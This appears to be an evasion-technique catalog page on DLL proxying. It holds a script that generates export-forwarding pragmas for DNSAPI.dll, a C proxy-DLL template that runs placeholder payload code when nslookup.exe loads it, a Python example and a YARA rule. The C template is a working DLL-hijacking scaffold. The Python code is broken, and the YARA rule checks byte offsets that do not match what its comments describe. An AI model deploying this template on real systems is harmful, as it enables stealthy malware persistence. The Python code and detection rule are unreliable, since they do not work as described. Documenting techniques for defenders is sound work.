DLL Proxying

Created the Monday 25 July 2022. Updated 2 months, 4 weeks ago.

DLL proxying is a technique used by malware to evade detection and gain persistence on a system. It involves replacing a legitimate DLL with a malicious DLL that has the same exported functions and is named similarly to the legitimate DLL.

When a program attempts to load the legitimate DLL, it will instead load the malicious DLL, which acts as a proxy for the legitimate DLL. The malicious DLL will redirect function calls to the legitimate DLL, allowing the malware to execute its own code and perform malicious actions without the program realizing that it is not the legitimate DLL.

This technique allows the malware to operate stealthily and evade detection by security software, as the malicious DLL is designed to mimic the legitimate DLL. This makes it difficult for security software to differentiate between the legitimate and malicious DLLs, allowing the malware to continue to operate undetected.

Technique Identifier

U1240

Technique Tags

DLL proxying Code obfuscation Persistence DLL redirection Stealth operation

Code Snippets

Description

Basic python script to extract all exported functions of a targeted DLL, here DNSAPI.dll used by nslookup.exe.

import pefile

exported_functions = []
pe = pefile.PE('C:\\windows\\system32\\DNSAPI.dll')
for entry in pe.DIRECTORY_ENTRY_EXPORT.symbols:
    func = entry.name.decode('utf-8')
    exported_functions.append(f'#pragma comment(linker,"/export:{func}=proxy.{func},@{entry.ordinal}")')

exported_functions = '\n'.join(exported_functions)
print(exported_functions)

Description

DLL Proxying code via DNSAPI.dll on nslookup.exe, in this exemple, the original DNSAPI.dll file must be renamed proxy.dll and the generated dll must be named DNSAPI.dll.

#pragma once
#pragma comment(linker,"/export:AdaptiveTimeout_ClearInterfaceSpecificConfiguration=proxy.AdaptiveTimeout_ClearInterfaceSpecificConfiguration,@1")
#pragma comment(linker,"/export:AdaptiveTimeout_ResetAdaptiveTimeout=proxy.AdaptiveTimeout_ResetAdaptiveTimeout,@2")
#pragma comment(linker,"/export:AddRefQueryBlobEx=proxy.AddRefQueryBlobEx,@3")
#pragma comment(linker,"/export:BreakRecordsIntoBlob=proxy.BreakRecordsIntoBlob,@4")
#pragma comment(linker,"/export:Coalesce_UpdateNetVersion=proxy.Coalesce_UpdateNetVersion,@5")
#pragma comment(linker,"/export:CombineRecordsInBlob=proxy.CombineRecordsInBlob,@6")
#pragma comment(linker,"/export:DeRefQueryBlobEx=proxy.DeRefQueryBlobEx,@7")
...

int Main()
{
    // Your payload code.
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        Main();
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Description

This code uses the ctypes library to load the legitimate DLL and retrieve the address of the function that will be called. It then defines a function named ProxyFunction that will be used to redirect calls to the legitimate DLL. When ProxyFunction is called, it will call the function in the legitimate DLL and return the result. As with the previous example, this code is just an example and more advanced implementations may be needed for more complex scenarios.

from ctypes import cdll

# Function prototype for the function that will be used to redirect calls to the legitimate DLL
ProxyFunction = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)

def DllMain():
    # Load the legitimate DLL
    hLegitDLL = ctypes.windll.LoadLibrary("legit.dll")
    if not hLegitDLL:
        # Handle error

    # Retrieve the address of the function in the legitimate DLL
    # This example uses a function named "FunctionA", but the function name can be anything
    FunctionA = ProxyFunction(hLegitDLL.FunctionA)
    if not FunctionA:
        # Handle error

# Function that will be used to redirect calls to the legitimate DLL
def ProxyFunction(arg):
    # Call the function
    return FunctionA(arg)

Detection Rules

                                    rule DLLProxying {
  condition:
    // Check for presence of DLL_PROCESS_ATTACH in DllMain function
    uint16(0) == 0x6461 and (
      // Check for the presence of LoadLibrary, which is used to load the legitimate DLL
      uint32(2) == 0x6C6C6100 and uint32(6) == 0x6574726F and
      
      // Check for the presence of GetProcAddress, which is used to retrieve the addresses of the functions in the legitimate DLL
      uint32(10) == 0x72630067 and uint32(14) == 0x61647079 and uint32(18) == 0x61636F00 and uint32(22) == 0x0072696E and
      
      // Check for the presence of a function that will be used to redirect function calls to the legitimate DLL
      // This example uses a function named "ProxyFunction", but the function name can be anything
      uint32(26) == 0x646E6900 and uint32(30) == 0x00667379
    )
    // Check for presence of dllexport attribute on the function that redirects calls to the legitimate DLL
    // This example uses a function named "ProxyFunction", but the function name can be anything
    and (pe.exports("ProxyFunction") or pe.exports("ProxyFunction@0"))
}

Contributors

Sh0ckFR

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

DLL Proxying

Technique Identifier

Technique Tags

Code Snippets

Detection Rules

Contributors

Additional Resources

External Links

Subscribe to our Newsletter